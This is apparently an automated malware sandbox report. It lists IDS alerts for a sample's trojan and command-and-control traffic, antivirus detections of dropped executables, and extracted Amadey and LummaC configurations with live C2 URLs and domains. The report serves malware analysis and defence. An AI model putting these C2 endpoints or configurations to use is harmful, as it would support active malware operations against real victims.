                              2024-12-22T02:18:57.308338+010020546531A Network Trojan was detected192.168.2.450247104.21.67.146443TCP
                              2024-12-22T02:19:09.526983+010020546531A Network Trojan was detected192.168.2.450287104.21.21.99443TCP
                              2024-12-22T02:19:14.023689+010020546531A Network Trojan was detected192.168.2.450298104.21.89.115443TCP
                              2024-12-22T02:19:18.795844+010020546531A Network Trojan was detected192.168.2.450304104.21.67.146443TCP
                              2024-12-22T02:21:35.728718+010020546531A Network Trojan was detected192.168.2.450517172.67.209.202443TCP
                              2024-12-22T02:21:37.739791+010020546531A Network Trojan was detected192.168.2.450520172.67.209.202443TCP
                              2024-12-22T02:21:52.503723+010020546531A Network Trojan was detected192.168.2.450544172.67.209.202443TCP
                              2024-12-22T02:23:02.125625+010020546531A Network Trojan was detected192.168.2.450614104.21.89.115443TCP
                              2024-12-22T02:23:04.162121+010020546531A Network Trojan was detected192.168.2.450616104.21.89.115443TCP
                              2024-12-22T02:23:17.711754+010020546531A Network Trojan was detected192.168.2.450639104.21.89.115443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:16:29.867508+010020498361A Network Trojan was detected192.168.2.449806172.67.209.202443TCP
                              2024-12-22T02:16:36.162646+010020498361A Network Trojan was detected192.168.2.449823104.21.67.146443TCP
                              2024-12-22T02:17:54.744267+010020498361A Network Trojan was detected192.168.2.450060104.21.21.99443TCP
                              2024-12-22T02:18:12.264243+010020498361A Network Trojan was detected192.168.2.450120104.21.21.99443TCP
                              2024-12-22T02:18:45.568691+010020498361A Network Trojan was detected192.168.2.450180104.21.21.99443TCP
                              2024-12-22T02:18:47.900850+010020498361A Network Trojan was detected192.168.2.450185104.21.89.115443TCP
                              2024-12-22T02:18:54.885994+010020498361A Network Trojan was detected192.168.2.450240104.21.67.146443TCP
                              2024-12-22T02:21:35.728718+010020498361A Network Trojan was detected192.168.2.450517172.67.209.202443TCP
                              2024-12-22T02:23:02.125625+010020498361A Network Trojan was detected192.168.2.450614104.21.89.115443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:16:32.377836+010020498121A Network Trojan was detected192.168.2.449814172.67.209.202443TCP
                              2024-12-22T02:16:38.219742+010020498121A Network Trojan was detected192.168.2.449831104.21.67.146443TCP
                              2024-12-22T02:17:59.189888+010020498121A Network Trojan was detected192.168.2.450068104.21.21.99443TCP
                              2024-12-22T02:18:14.500972+010020498121A Network Trojan was detected192.168.2.450128104.21.21.99443TCP
                              2024-12-22T02:18:48.034298+010020498121A Network Trojan was detected192.168.2.450189104.21.21.99443TCP
                              2024-12-22T02:18:50.417360+010020498121A Network Trojan was detected192.168.2.450205104.21.89.115443TCP
                              2024-12-22T02:18:57.308338+010020498121A Network Trojan was detected192.168.2.450247104.21.67.146443TCP
                              2024-12-22T02:21:37.739791+010020498121A Network Trojan was detected192.168.2.450520172.67.209.202443TCP
                              2024-12-22T02:23:04.162121+010020498121A Network Trojan was detected192.168.2.450616104.21.89.115443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:17:53.710812+010020583611Domain Observed Used for C2 Detected192.168.2.450060104.21.21.99443TCP
                              2024-12-22T02:17:56.390951+010020583611Domain Observed Used for C2 Detected192.168.2.450068104.21.21.99443TCP
                              2024-12-22T02:18:11.249239+010020583611Domain Observed Used for C2 Detected192.168.2.450120104.21.21.99443TCP
                              2024-12-22T02:18:13.327037+010020583611Domain Observed Used for C2 Detected192.168.2.450125104.21.21.99443TCP
                              2024-12-22T02:18:13.727782+010020583611Domain Observed Used for C2 Detected192.168.2.450128104.21.21.99443TCP
                              2024-12-22T02:18:15.853049+010020583611Domain Observed Used for C2 Detected192.168.2.450134104.21.21.99443TCP
                              2024-12-22T02:18:19.112536+010020583611Domain Observed Used for C2 Detected192.168.2.450140104.21.21.99443TCP
                              2024-12-22T02:18:20.871417+010020583611Domain Observed Used for C2 Detected192.168.2.450141104.21.21.99443TCP
                              2024-12-22T02:18:26.676005+010020583611Domain Observed Used for C2 Detected192.168.2.450157104.21.21.99443TCP
                              2024-12-22T02:18:27.288592+010020583611Domain Observed Used for C2 Detected192.168.2.450158104.21.21.99443TCP
                              2024-12-22T02:18:31.148526+010020583611Domain Observed Used for C2 Detected192.168.2.450162104.21.21.99443TCP
                              2024-12-22T02:18:35.225117+010020583611Domain Observed Used for C2 Detected192.168.2.450168104.21.21.99443TCP
                              2024-12-22T02:18:35.564629+010020583611Domain Observed Used for C2 Detected192.168.2.450169104.21.21.99443TCP
                              2024-12-22T02:18:40.872079+010020583611Domain Observed Used for C2 Detected192.168.2.450174104.21.21.99443TCP
                              2024-12-22T02:18:42.523962+010020583611Domain Observed Used for C2 Detected192.168.2.450177104.21.21.99443TCP
                              2024-12-22T02:18:44.392432+010020583611Domain Observed Used for C2 Detected192.168.2.450180104.21.21.99443TCP
                              2024-12-22T02:18:47.155471+010020583611Domain Observed Used for C2 Detected192.168.2.450186104.21.21.99443TCP
                              2024-12-22T02:18:47.244318+010020583611Domain Observed Used for C2 Detected192.168.2.450189104.21.21.99443TCP
                              2024-12-22T02:18:51.583167+010020583611Domain Observed Used for C2 Detected192.168.2.450222104.21.21.99443TCP
                              2024-12-22T02:18:54.202297+010020583611Domain Observed Used for C2 Detected192.168.2.450238104.21.21.99443TCP
                              2024-12-22T02:18:56.513771+010020583611Domain Observed Used for C2 Detected192.168.2.450246104.21.21.99443TCP
                              2024-12-22T02:18:59.069531+010020583611Domain Observed Used for C2 Detected192.168.2.450253104.21.21.99443TCP
                              2024-12-22T02:19:05.778609+010020583611Domain Observed Used for C2 Detected192.168.2.450276104.21.21.99443TCP
                              2024-12-22T02:19:08.740055+010020583611Domain Observed Used for C2 Detected192.168.2.450287104.21.21.99443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:16:29.118059+010020583981Domain Observed Used for C2 Detected192.168.2.449806172.67.209.202443TCP
                              2024-12-22T02:16:31.600922+010020583981Domain Observed Used for C2 Detected192.168.2.449814172.67.209.202443TCP
                              2024-12-22T02:16:35.270547+010020583981Domain Observed Used for C2 Detected192.168.2.449822172.67.209.202443TCP
                              2024-12-22T02:16:37.742476+010020583981Domain Observed Used for C2 Detected192.168.2.449832172.67.209.202443TCP
                              2024-12-22T02:16:40.187887+010020583981Domain Observed Used for C2 Detected192.168.2.449837172.67.209.202443TCP
                              2024-12-22T02:16:42.967084+010020583981Domain Observed Used for C2 Detected192.168.2.449843172.67.209.202443TCP
                              2024-12-22T02:16:45.744612+010020583981Domain Observed Used for C2 Detected192.168.2.449858172.67.209.202443TCP
                              2024-12-22T02:16:50.956303+010020583981Domain Observed Used for C2 Detected192.168.2.449875172.67.209.202443TCP
                              2024-12-22T02:21:34.966397+010020583981Domain Observed Used for C2 Detected192.168.2.450517172.67.209.202443TCP
                              2024-12-22T02:21:36.960526+010020583981Domain Observed Used for C2 Detected192.168.2.450520172.67.209.202443TCP
                              2024-12-22T02:21:39.594134+010020583981Domain Observed Used for C2 Detected192.168.2.450523172.67.209.202443TCP
                              2024-12-22T02:21:41.997027+010020583981Domain Observed Used for C2 Detected192.168.2.450526172.67.209.202443TCP
                              2024-12-22T02:21:44.206069+010020583981Domain Observed Used for C2 Detected192.168.2.450527172.67.209.202443TCP
                              2024-12-22T02:21:46.956179+010020583981Domain Observed Used for C2 Detected192.168.2.450533172.67.209.202443TCP
                              2024-12-22T02:21:49.582086+010020583981Domain Observed Used for C2 Detected192.168.2.450541172.67.209.202443TCP
                              2024-12-22T02:21:51.742096+010020583981Domain Observed Used for C2 Detected192.168.2.450544172.67.209.202443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:18:43.359656+010020197142Potentially Bad Traffic192.168.2.450178185.215.113.1680TCP
                              2024-12-22T02:18:49.630549+010020197142Potentially Bad Traffic192.168.2.450203185.215.113.1680TCP
                              2024-12-22T02:19:10.985979+010020197142Potentially Bad Traffic192.168.2.450291185.215.113.1680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:16:20.050715+010020446961A Network Trojan was detected192.168.2.449785185.215.113.4380TCP
                              2024-12-22T02:16:27.157819+010020446961A Network Trojan was detected192.168.2.449802185.215.113.4380TCP
                              2024-12-22T02:16:35.972597+010020446961A Network Trojan was detected192.168.2.449824185.215.113.4380TCP
                              2024-12-22T02:16:42.400597+010020446961A Network Trojan was detected192.168.2.449842185.215.113.4380TCP
                              2024-12-22T02:16:49.044371+010020446961A Network Trojan was detected192.168.2.449865185.215.113.4380TCP
                              2024-12-22T02:17:01.316285+010020446961A Network Trojan was detected192.168.2.449906185.215.113.4380TCP
                              2024-12-22T02:17:13.860156+010020446961A Network Trojan was detected192.168.2.449942185.215.113.4380TCP
                              2024-12-22T02:17:26.991253+010020446961A Network Trojan was detected192.168.2.449978185.215.113.4380TCP
                              2024-12-22T02:17:36.074423+010020446961A Network Trojan was detected192.168.2.449997185.215.113.4380TCP
                              2024-12-22T02:17:44.671627+010020446961A Network Trojan was detected192.168.2.450024185.215.113.4380TCP
                              2024-12-22T02:17:55.833608+010020446961A Network Trojan was detected192.168.2.450061185.215.113.4380TCP
                              2024-12-22T02:18:04.224431+010020446961A Network Trojan was detected192.168.2.450089185.215.113.4380TCP
                              2024-12-22T02:18:15.274222+010020446961A Network Trojan was detected192.168.2.450129185.215.113.4380TCP
                              2024-12-22T02:18:54.437305+010020446961A Network Trojan was detected192.168.2.450233185.215.113.4380TCP
                              2024-12-22T02:21:21.319108+010020446961A Network Trojan was detected192.168.2.450501185.215.113.4380TCP
                              2024-12-22T02:21:32.795375+010020446961A Network Trojan was detected192.168.2.450509185.215.113.4380TCP
                              2024-12-22T02:22:20.898558+010020446961A Network Trojan was detected192.168.2.450571185.215.113.4380TCP
                              2024-12-22T02:22:57.055457+010020446961A Network Trojan was detected192.168.2.450608185.215.113.4380TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:17:38.683428+010020543501A Network Trojan was detected192.168.2.450005185.121.15.19280TCP
                              2024-12-22T02:17:40.574994+010020543501A Network Trojan was detected192.168.2.450016185.121.15.19280TCP
                              2024-12-22T02:18:24.407639+010020543501A Network Trojan was detected192.168.2.450144185.121.15.19280TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:17:52.164628+010020583601Domain Observed Used for C2 Detected192.168.2.4539981.1.1.153UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:17:51.632273+010020583641Domain Observed Used for C2 Detected192.168.2.4650721.1.1.153UDP
                              2024-12-22T02:18:09.812504+010020583641Domain Observed Used for C2 Detected192.168.2.4498391.1.1.153UDP
                              2024-12-22T02:18:42.810886+010020583641Domain Observed Used for C2 Detected192.168.2.4520721.1.1.153UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:16:27.549091+010020583971Domain Observed Used for C2 Detected192.168.2.4571731.1.1.153UDP
                              2024-12-22T02:21:33.495571+010020583971Domain Observed Used for C2 Detected192.168.2.4566391.1.1.153UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:17:50.734247+010020583781Domain Observed Used for C2 Detected192.168.2.4612531.1.1.153UDP
                              2024-12-22T02:18:09.608650+010020583781Domain Observed Used for C2 Detected192.168.2.4607891.1.1.153UDP
                              2024-12-22T02:18:42.555707+010020583781Domain Observed Used for C2 Detected192.168.2.4642821.1.1.153UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:18:13.123701+010020442451Malware Command and Control Activity Detected185.215.113.20680192.168.2.450121TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:18:12.967736+010020442441Malware Command and Control Activity Detected192.168.2.450121185.215.113.20680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:18:13.443362+010020442461Malware Command and Control Activity Detected192.168.2.450121185.215.113.20680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:18:15.340948+010020442481Malware Command and Control Activity Detected192.168.2.450121185.215.113.20680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:18:13.931765+010020442471Malware Command and Control Activity Detected185.215.113.20680192.168.2.450121TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:16:36.418896+010020480941Malware Command and Control Activity Detected192.168.2.449822172.67.209.202443TCP
                              2024-12-22T02:16:46.656890+010020480941Malware Command and Control Activity Detected192.168.2.449852104.21.67.146443TCP
                              2024-12-22T02:18:21.671674+010020480941Malware Command and Control Activity Detected192.168.2.450141104.21.21.99443TCP
                              2024-12-22T02:18:52.550863+010020480941Malware Command and Control Activity Detected192.168.2.450222104.21.21.99443TCP
                              2024-12-22T02:18:58.413276+010020480941Malware Command and Control Activity Detected192.168.2.450250104.21.89.115443TCP
                              2024-12-22T02:19:04.170244+010020480941Malware Command and Control Activity Detected192.168.2.450264104.21.67.146443TCP
                              2024-12-22T02:21:42.902536+010020480941Malware Command and Control Activity Detected192.168.2.450526172.67.209.202443TCP
                              2024-12-22T02:23:13.308374+010020480941Malware Command and Control Activity Detected192.168.2.450633104.21.89.115443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:18:12.442007+010020442431Malware Command and Control Activity Detected192.168.2.450121185.215.113.20680TCP
                              2024-12-22T02:19:09.972691+010020442431Malware Command and Control Activity Detected192.168.2.450288185.215.113.20680TCP
                              2024-12-22T02:19:16.361190+010020442431Malware Command and Control Activity Detected192.168.2.450302185.215.113.20680TCP
                              2024-12-22T02:19:23.289904+010020442431Malware Command and Control Activity Detected192.168.2.450325185.215.113.20680TCP
                              2024-12-22T02:19:30.539459+010020442431Malware Command and Control Activity Detected192.168.2.450357185.215.113.20680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:16:07.338429+010028561471A Network Trojan was detected192.168.2.449753185.215.113.4380TCP
                              2024-12-22T02:21:16.862732+010028561471A Network Trojan was detected192.168.2.450498212.193.31.880TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:16:49.288084+010028561481A Network Trojan was detected192.168.2.449866212.193.31.880TCP
                              2024-12-22T02:16:55.433332+010028561481A Network Trojan was detected192.168.2.449890212.193.31.880TCP
                              2024-12-22T02:17:01.499458+010028561481A Network Trojan was detected192.168.2.449907212.193.31.880TCP
                              2024-12-22T02:17:07.846728+010028561481A Network Trojan was detected192.168.2.449925212.193.31.880TCP
                              2024-12-22T02:17:13.976404+010028561481A Network Trojan was detected192.168.2.449945212.193.31.880TCP
                              2024-12-22T02:17:20.238998+010028561481A Network Trojan was detected192.168.2.449960212.193.31.880TCP
                              2024-12-22T02:17:26.611114+010028561481A Network Trojan was detected192.168.2.449974212.193.31.880TCP
                              2024-12-22T02:17:33.198289+010028561481A Network Trojan was detected192.168.2.449991212.193.31.880TCP
                              2024-12-22T02:17:39.353977+010028561481A Network Trojan was detected192.168.2.450011212.193.31.880TCP
                              2024-12-22T02:17:45.817182+010028561481A Network Trojan was detected192.168.2.450025212.193.31.880TCP
                              2024-12-22T02:17:53.064208+010028561481A Network Trojan was detected192.168.2.450051212.193.31.880TCP
                              2024-12-22T02:17:59.422173+010028561481A Network Trojan was detected192.168.2.450078212.193.31.880TCP
                              2024-12-22T02:18:06.202323+010028561481A Network Trojan was detected192.168.2.450097212.193.31.880TCP
                              2024-12-22T02:18:12.786767+010028561481A Network Trojan was detected192.168.2.450124212.193.31.880TCP
                              2024-12-22T02:18:18.929899+010028561481A Network Trojan was detected192.168.2.450139212.193.31.880TCP
                              2024-12-22T02:18:25.476403+010028561481A Network Trojan was detected192.168.2.450153212.193.31.880TCP
                              2024-12-22T02:18:32.076457+010028561481A Network Trojan was detected192.168.2.450165212.193.31.880TCP
                              2024-12-22T02:18:38.307122+010028561481A Network Trojan was detected192.168.2.450171212.193.31.880TCP
                              2024-12-22T02:18:45.247121+010028561481A Network Trojan was detected192.168.2.450181212.193.31.880TCP
                              2024-12-22T02:18:51.845973+010028561481A Network Trojan was detected192.168.2.450223212.193.31.880TCP
                              2024-12-22T02:18:58.504689+010028561481A Network Trojan was detected192.168.2.450252212.193.31.880TCP
                              2024-12-22T02:19:05.019592+010028561481A Network Trojan was detected192.168.2.450269212.193.31.880TCP
                              2024-12-22T02:19:12.013779+010028561481A Network Trojan was detected192.168.2.450295212.193.31.880TCP
                              2024-12-22T02:19:18.107488+010028561481A Network Trojan was detected192.168.2.450306212.193.31.880TCP
                              2024-12-22T02:19:24.372914+010028561481A Network Trojan was detected192.168.2.450339212.193.31.880TCP
                              2024-12-22T02:19:30.427962+010028561481A Network Trojan was detected192.168.2.450358212.193.31.880TCP
                              2024-12-22T02:19:36.491350+010028561481A Network Trojan was detected192.168.2.450366212.193.31.880TCP
                              2024-12-22T02:19:42.735546+010028561481A Network Trojan was detected192.168.2.450372212.193.31.880TCP
                              2024-12-22T02:19:48.787598+010028561481A Network Trojan was detected192.168.2.450386212.193.31.880TCP
                              2024-12-22T02:19:54.809650+010028561481A Network Trojan was detected192.168.2.450402212.193.31.880TCP
                              2024-12-22T02:20:00.842641+010028561481A Network Trojan was detected192.168.2.450406212.193.31.880TCP
                              2024-12-22T02:20:06.879631+010028561481A Network Trojan was detected192.168.2.450412212.193.31.880TCP
                              2024-12-22T02:20:12.916411+010028561481A Network Trojan was detected192.168.2.450416212.193.31.880TCP
                              2024-12-22T02:20:19.013424+010028561481A Network Trojan was detected192.168.2.450428212.193.31.880TCP
                              2024-12-22T02:20:25.065544+010028561481A Network Trojan was detected192.168.2.450435212.193.31.880TCP
                              2024-12-22T02:20:31.444346+010028561481A Network Trojan was detected192.168.2.450447212.193.31.880TCP
                              2024-12-22T02:20:37.472580+010028561481A Network Trojan was detected192.168.2.450451212.193.31.880TCP
                              2024-12-22T02:20:43.538037+010028561481A Network Trojan was detected192.168.2.450455212.193.31.880TCP
                              2024-12-22T02:20:49.577276+010028561481A Network Trojan was detected192.168.2.450460212.193.31.880TCP
                              2024-12-22T02:20:55.616587+010028561481A Network Trojan was detected192.168.2.450472212.193.31.880TCP
                              2024-12-22T02:21:01.671951+010028561481A Network Trojan was detected192.168.2.450476212.193.31.880TCP
                              2024-12-22T02:21:07.721338+010028561481A Network Trojan was detected192.168.2.450489212.193.31.880TCP
                              2024-12-22T02:21:13.780895+010028561481A Network Trojan was detected192.168.2.450496212.193.31.880TCP
                              2024-12-22T02:21:19.849771+010028561481A Network Trojan was detected192.168.2.450500212.193.31.880TCP
                              2024-12-22T02:21:25.987851+010028561481A Network Trojan was detected192.168.2.450504212.193.31.880TCP
                              2024-12-22T02:21:32.143982+010028561481A Network Trojan was detected192.168.2.450508212.193.31.880TCP
                              2024-12-22T02:21:38.319056+010028561481A Network Trojan was detected192.168.2.450521212.193.31.880TCP
                              2024-12-22T02:21:44.448509+010028561481A Network Trojan was detected192.168.2.450528212.193.31.880TCP
                              2024-12-22T02:21:50.569457+010028561481A Network Trojan was detected192.168.2.450542212.193.31.880TCP
                              2024-12-22T02:21:56.661111+010028561481A Network Trojan was detected192.168.2.450547212.193.31.880TCP
                              2024-12-22T02:22:02.827085+010028561481A Network Trojan was detected192.168.2.450558212.193.31.880TCP
                              2024-12-22T02:22:08.898113+010028561481A Network Trojan was detected192.168.2.450562212.193.31.880TCP
                              2024-12-22T02:22:14.962769+010028561481A Network Trojan was detected192.168.2.450567212.193.31.880TCP
                              2024-12-22T02:22:21.049253+010028561481A Network Trojan was detected192.168.2.450572212.193.31.880TCP
                              2024-12-22T02:22:27.127593+010028561481A Network Trojan was detected192.168.2.450580212.193.31.880TCP
                              2024-12-22T02:22:33.170948+010028561481A Network Trojan was detected192.168.2.450584212.193.31.880TCP
                              2024-12-22T02:22:39.360469+010028561481A Network Trojan was detected192.168.2.450595212.193.31.880TCP
                              2024-12-22T02:22:45.413451+010028561481A Network Trojan was detected192.168.2.450598212.193.31.880TCP
                              2024-12-22T02:22:51.686427+010028561481A Network Trojan was detected192.168.2.450604212.193.31.880TCP
                              2024-12-22T02:22:57.752693+010028561481A Network Trojan was detected192.168.2.450610212.193.31.880TCP
                              2024-12-22T02:23:03.841486+010028561481A Network Trojan was detected192.168.2.450617212.193.31.880TCP
                              2024-12-22T02:23:09.910578+010028561481A Network Trojan was detected192.168.2.450623212.193.31.880TCP
                              2024-12-22T02:23:15.963476+010028561481A Network Trojan was detected192.168.2.450637212.193.31.880TCP
                              2024-12-22T02:23:21.997068+010028561481A Network Trojan was detected192.168.2.450642212.193.31.880TCP
                              2024-12-22T02:23:28.044776+010028561481A Network Trojan was detected192.168.2.450646212.193.31.880TCP
                              2024-12-22T02:23:34.099774+010028561481A Network Trojan was detected192.168.2.450650212.193.31.880TCP
                              2024-12-22T02:23:40.143509+010028561481A Network Trojan was detected192.168.2.450654212.193.31.880TCP
                              2024-12-22T02:23:46.212321+010028561481A Network Trojan was detected192.168.2.450665212.193.31.880TCP
                              2024-12-22T02:23:52.318557+010028561481A Network Trojan was detected192.168.2.450669212.193.31.880TCP
                              2024-12-22T02:23:58.364622+010028561481A Network Trojan was detected192.168.2.450673212.193.31.880TCP
                              2024-12-22T02:24:04.447895+010028561481A Network Trojan was detected192.168.2.450677212.193.31.880TCP
                              2024-12-22T02:24:10.519028+010028561481A Network Trojan was detected192.168.2.450681212.193.31.880TCP
                              2024-12-22T02:24:16.568999+010028561481A Network Trojan was detected192.168.2.450685212.193.31.880TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:16:18.699038+010028561221A Network Trojan was detected185.215.113.4380192.168.2.449759TCP
                              2024-12-22T02:18:53.046933+010028561221A Network Trojan was detected185.215.113.4380192.168.2.450191TCP
                              2024-12-22T02:21:19.958374+010028561221A Network Trojan was detected185.215.113.4380192.168.2.450497TCP
                              2024-12-22T02:21:31.440183+010028561221A Network Trojan was detected185.215.113.4380192.168.2.450505TCP
                              2024-12-22T02:22:19.546142+010028561221A Network Trojan was detected185.215.113.4380192.168.2.450568TCP
                              2024-12-22T02:22:55.690496+010028561221A Network Trojan was detected185.215.113.4380192.168.2.450605TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:16:12.042671+010028033053Unknown Traffic192.168.2.44976531.41.244.1180TCP
                              2024-12-22T02:16:21.681018+010028033053Unknown Traffic192.168.2.44978731.41.244.1180TCP
                              2024-12-22T02:16:28.617935+010028033053Unknown Traffic192.168.2.44980431.41.244.1180TCP
                              2024-12-22T02:16:37.421176+010028033053Unknown Traffic192.168.2.44983031.41.244.1180TCP
                              2024-12-22T02:16:43.848701+010028033053Unknown Traffic192.168.2.44985131.41.244.1180TCP
                              2024-12-22T02:16:50.948817+010028033053Unknown Traffic192.168.2.44987231.41.244.1180TCP
                              2024-12-22T02:17:02.800003+010028033053Unknown Traffic192.168.2.44991431.41.244.1180TCP
                              2024-12-22T02:17:15.391073+010028033053Unknown Traffic192.168.2.44994731.41.244.1180TCP
                              2024-12-22T02:17:28.444771+010028033053Unknown Traffic192.168.2.44998031.41.244.1180TCP
                              2024-12-22T02:17:37.607585+010028033053Unknown Traffic192.168.2.450004185.215.113.1680TCP
                              2024-12-22T02:17:46.221182+010028033053Unknown Traffic192.168.2.450026185.215.113.1680TCP
                              2024-12-22T02:17:57.454162+010028033053Unknown Traffic192.168.2.450069185.215.113.1680TCP
                              2024-12-22T02:18:05.847798+010028033053Unknown Traffic192.168.2.450096185.215.113.1680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:18:16.150144+010028033043Unknown Traffic192.168.2.450121185.215.113.20680TCP
                              2024-12-22T02:18:37.111236+010028033043Unknown Traffic192.168.2.450163185.215.113.20680TCP
                              2024-12-22T02:18:39.513727+010028033043Unknown Traffic192.168.2.450163185.215.113.20680TCP
                              2024-12-22T02:18:41.135548+010028033043Unknown Traffic192.168.2.450163185.215.113.20680TCP
                              2024-12-22T02:18:42.521973+010028033043Unknown Traffic192.168.2.450163185.215.113.20680TCP
                              2024-12-22T02:18:46.528368+010028033043Unknown Traffic192.168.2.450163185.215.113.20680TCP
                              2024-12-22T02:18:47.990676+010028033043Unknown Traffic192.168.2.450163185.215.113.20680TCP
                              2024-12-22T02:18:54.731503+010028033043Unknown Traffic192.168.2.450241185.215.113.1680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:19:05.988229+010028438641A Network Trojan was detected192.168.2.450276104.21.21.99443TCP
                              2024-12-22T02:21:50.516015+010028438641A Network Trojan was detected192.168.2.450541172.67.209.202443TCP
                              2024-12-22T02:23:15.693434+010028438641A Network Trojan was detected192.168.2.450636104.21.89.115443TCP

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: file.exeAvira: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeAvira: detection malicious, Label: HEUR/AGEN.1320706
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                              Source: 5cda6c90d7.exe.5040.12.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["cheapptaxysu.click", "necklacebudi.lat", "aspecteirs.lat", "crosshuaht.lat", "rapeflowwj.lat", "discokeyus.lat", "sustainskelet.lat", "grannyejh.lat", "energyaffai.lat"], "Build id": "CZJvss--geopoxid"}
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeReversingLabs: Detection: 21%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeReversingLabs: Detection: 63%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exeReversingLabs: Detection: 86%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeReversingLabs: Detection: 47%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]ReversingLabs: Detection: 75%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exeReversingLabs: Detection: 55%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeReversingLabs: Detection: 68%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[4].exeReversingLabs: Detection: 57%
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeReversingLabs: Detection: 21%
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeReversingLabs: Detection: 68%
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeReversingLabs: Detection: 47%
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeReversingLabs: Detection: 55%
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeReversingLabs: Detection: 63%
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeReversingLabs: Detection: 86%
                              Source: C:\Users\user\AppData\Local\Temp\1019813001\cc6b47fc15.exeReversingLabs: Detection: 47%
                              Source: C:\Users\user\AppData\Local\Temp\YVDVBfFGR3eAeBewwD9vewWwVe0B\Y-Cleaner.exeReversingLabs: Detection: 75%
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 57%
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeReversingLabs: Detection: 55%
                              Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeReversingLabs: Detection: 69%
                              Source: file.exeReversingLabs: Detection: 57%
                              Source: file.exeVirustotal: Detection: 59%Perma Link
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exeJoe Sandbox ML: detected
